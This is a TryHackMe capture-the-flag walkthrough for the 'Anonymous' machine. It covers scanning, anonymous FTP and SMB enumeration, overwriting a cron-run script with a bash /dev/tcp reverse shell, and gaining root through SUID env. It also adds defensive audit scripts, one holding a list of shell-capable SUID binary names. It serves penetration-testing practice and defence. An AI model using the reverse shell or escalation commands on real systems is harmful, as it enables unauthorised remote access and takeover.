CTF Challenges, TryHackME

Anonymous TryHackMe Walkthrough

Today it is time to solve another challenge called “Anonymous”. It is available at TryHackMe for penetration testing practice. This challenge is of medium difficulty if you have the right basic knowledge and are attentive to the little details required during enumeration. The credit for making this machine goes to Nameless0ne. The breakdown of the machine, with the flags redacted, is as follows:

Level: Medium

Penetration Testing Methodology

Network Scanning

  • Nmap Scan

Enumeration

  • Enumerating FTP Service
  • Downloading scripts from FTP
  • Investigating Scripts
  • Enumerating SMB Shares
  • Downloading Image files from Shares

Exploitation

  • Uploading Reverse Shell Script on FTP
  • Getting User Shell
  • Reading User Flag

Privilege Escalation

  • Enumerating for SUID bits
  • Exploiting SUID on env
  • Reading Root Flag

Walkthrough

There are two flags to discover on this machine. After booting up the target machine from the TryHackMe Anonymous page, an IP address is assigned to it and shown on that page.

IP Address: 10.10.3.52

Apart from the two flags, you need to answer four questions to complete this room. The questions are listed below at the points where their answers are discovered.

Network Scanning

To begin, we need to learn which services are running on which ports. We use Nmap with the -sC and -sV flags, which runs the default NSE scripts against each open port and identifies the version of each service found.

nmap -sC -sV 10.10.3.52

Nmap detected an FTP service on port 21, SSH on port 22, and SMB on ports 139 and 445. Nmap also reported that the FTP server allows anonymous login, so it can be accessed right away.

Q.1. Enumerate the machine. How many ports are open?

4

Q.2. What service is running on port 21?

FTP

Q.3. What service is running on ports 139 and 445?

SMB

Enumeration

After logging into FTP anonymously, a scripts directory was found. It contained a shell script called clean.sh, a log file named removed_files.log and a text file named to_do.txt. All three files were downloaded to the local Kali Linux machine for further investigation.

ftp 10.10.3.52
ls -la
cd scripts
ls -la
get clean.sh
get removed_files.log
get to_do.txt

The to_do.txt file was a reminder to disable anonymous login; it is not useful from the attacker’s perspective. The removed_files.log file contained output from the clean-up script stating that there was nothing to delete.

cat to_do.txt
cat removed_files.log

The clean.sh script is a shell script that appeared to write log entries and delete files from the /tmp/ directory.

cat clean.sh

With nothing more to enumerate on FTP, we moved on to the SMB service. We used smbclient to perform an anonymous login on the target machine, which exposed a share named pics. Inside it we found two images, corgo2.jpg and puppos.jpeg, and downloaded both to the local Kali machine.

smbclient -L \\anonymous -I 10.10.3.52
smbclient //10.10.3.52/pics
ls
get corgo2.jpg
get puppos.jpeg

Q.4. There’s a share on the user’s computer. What’s it called?

pics

After opening the image files, it was clear that SMB was a rabbit hole: neither image is of any use from the attacker’s perspective.

Exploitation

Back on the FTP service, we noticed that anonymous users could upload files into the scripts directory. Because the target runs clean.sh from that directory, an attacker can write a clean.sh containing a reverse shell, upload it to replace the one currently on the target machine, and wait for the script to be executed.

nano clean.sh
bash -i >& /dev/tcp/10.10.120.144/1234 0>&1

Before uploading the script, we started a netcat listener on the local Kali machine to catch the shell that the target would spawn when it executed clean.sh. The listener must use the port number given in the reverse shell script. After connecting to the FTP service, we replaced clean.sh using the put command.

ftp 10.10.3.52
cd scripts
put clean.sh
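The foothold here comes from one misconfiguration: a script the target executes on a schedule lives in a directory that an anonymous FTP user can write to. The following is an added defender-side check, not part of the original write-up and not the challenge author's code. It walks a directory tree, reports every *.sh file that is writable by group or others, or that sits in a directory writable by group or others, and counts how many are exposed; the directory layout it is run against is whatever you pass in (the sample paths used in the test are constructed).

```shell
#!/bin/sh
# Added example (not from the original write-up): audit scheduled shell scripts
# for the weakness exploited above, a script that a non-owner could rewrite.
# A script is "exposed" if its own mode grants write to group/others, or if its
# parent directory does (anyone who can write the directory can replace the file).
# Remediation for a hit is the usual chown root:root / chmod 755 on both.

# is_group_or_world_writable PATH
# Succeeds (exit 0) when PATH, file or directory, has g+w or o+w set.
is_group_or_world_writable() {
    [ -n "$(find "$1" -maxdepth 0 \( -perm -g=w -o -perm -o=w \) -print 2>/dev/null)" ]
}

# audit_scripts DIR
# For every regular *.sh file under DIR prints one line:  <path> <verdict>
# verdict is "ok", "file-writable", "dir-writable", or both joined by a comma.
audit_scripts() {
    find "$1" -type f -name '*.sh' -print 2>/dev/null | sort | while IFS= read -r f; do
        verdict=""
        if is_group_or_world_writable "$f"; then
            verdict="file-writable"
        fi
        if is_group_or_world_writable "$(dirname "$f")"; then
            verdict="${verdict:+$verdict,}dir-writable"
        fi
        printf '%s %s\n' "$f" "${verdict:-ok}"
    done
}

# count_exposed DIR
# Prints the number of scripts under DIR whose verdict is not "ok".
count_exposed() {
    audit_scripts "$1" | grep -vc ' ok$' || true
}

# Stand-alone usage: audit the directory given on the command line
# (defaults to /etc/cron.d, a common home for scheduled scripts).
if [ "${0##*/}" = "audit_scripts.sh" ]; then
    audit_scripts "${1:-/etc/cron.d}"
    printf 'exposed scripts: %s\n' "$(count_exposed "${1:-/etc/cron.d}")"
fi
```

Run it against the FTP root and against the directory the cron job actually reads from; on this machine both point at the same scripts directory, which is exactly the condition the check is built to catch. The same logic applies to any file executed by root on a timer, not only *.sh, so widen the -name filter to match your own naming.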

The netcat listener caught the reverse shell generated when the target executed clean.sh. The session runs as the user namelessone. Listing the contents of that user’s home directory revealed the user.txt flag.

nc -lvp 1234
ls
cat user.txt

Privilege Escalation

Post-exploitation enumeration for ways to elevate privileges began with a search for SUID binaries, for which the find command is commonly used. Interestingly, /usr/bin/env had the SUID bit set, which means a user could potentially abuse it to gain elevated access to the machine.

find / -perm -u=s 2>/dev/null

To get the env syntax for elevating privileges, we consulted GTFOBins. The entry explains that the provided command doesn’t elevate privileges directly; instead, it creates a local SUID copy of the binary and runs it with elevated privileges. Combined with /bin/sh, this provides an elevated shell.

When executed in namelessone’s shell, the command gave us a root shell, which we confirmed with the whoami command. Finally, to finish the challenge, we read the root flag with cat.

/usr/bin/env /bin/sh -p
whoami
cat /root/root.txt
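The find command above is a one-off look; on a host you defend, the useful version is a repeatable comparison against a known-good list, so that a newly set SUID bit on something like env stands out. The block below is an added example, not part of the original write-up, showing that: list SUID files under a root, diff them against a saved baseline, and separately flag binaries whose names appear in a short constructed list of programs that GTFOBins documents as able to run arbitrary commands when SUID (env is one of them). The baseline file format and the list of risky names are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original write-up): turn `find / -perm -u=s` into a
# baseline check. Save list_suid output once on a trusted host, then run new_suid
# on a schedule; anything it prints is a SUID bit that was not there before.

# Constructed short list of program names that should not be SUID on a
# production host because they execute arbitrary programs or shells
# (all have a SUID entry on GTFOBins). Extend it for your own environment.
RISKY_SUID_NAMES="env bash dash sh find vim python python3 perl"

# list_suid ROOT
# Prints the sorted paths of regular files under ROOT that carry the SUID bit.
list_suid() {
    find "$1" -type f -perm -u=s -print 2>/dev/null | sort
}

# new_suid ROOT BASELINE
# Prints SUID files under ROOT that are not listed in BASELINE (one path per
# line, as written earlier by `list_suid ROOT > BASELINE`). Prints nothing when
# the host still matches its baseline.
new_suid() {
    list_suid "$1" | grep -vxF -f "$2" || true
}

# risky_suid ROOT
# Prints SUID files under ROOT whose basename is in RISKY_SUID_NAMES, regardless
# of whether the baseline knows about them: a baseline recorded on an already
# misconfigured host would otherwise hide exactly the binary abused above.
risky_suid() {
    list_suid "$1" | while IFS= read -r f; do
        b=$(basename "$f")
        for n in $RISKY_SUID_NAMES; do
            if [ "$b" = "$n" ]; then
                printf '%s\n' "$f"
                break
            fi
        done
    done
}

# Stand-alone usage: suid_audit.sh ROOT BASELINE
if [ "${0##*/}" = "suid_audit.sh" ]; then
    echo "== SUID files not in baseline =="
    new_suid "${1:-/}" "${2:-/var/lib/suid.baseline}"
    echo "== SUID files that are shell-capable =="
    risky_suid "${1:-/}"
fi
```

Record the baseline from a freshly built image rather than from a running server, and keep it somewhere the server cannot write, otherwise an intruder who already has root can simply update it. On the machine in this write-up, risky_suid would have printed /usr/bin/env whether or not a baseline existed.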

Hope you enjoyed this TryHackMe write-up. Follow this link for more TryHackMe CTFs.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on Twitter and LinkedIn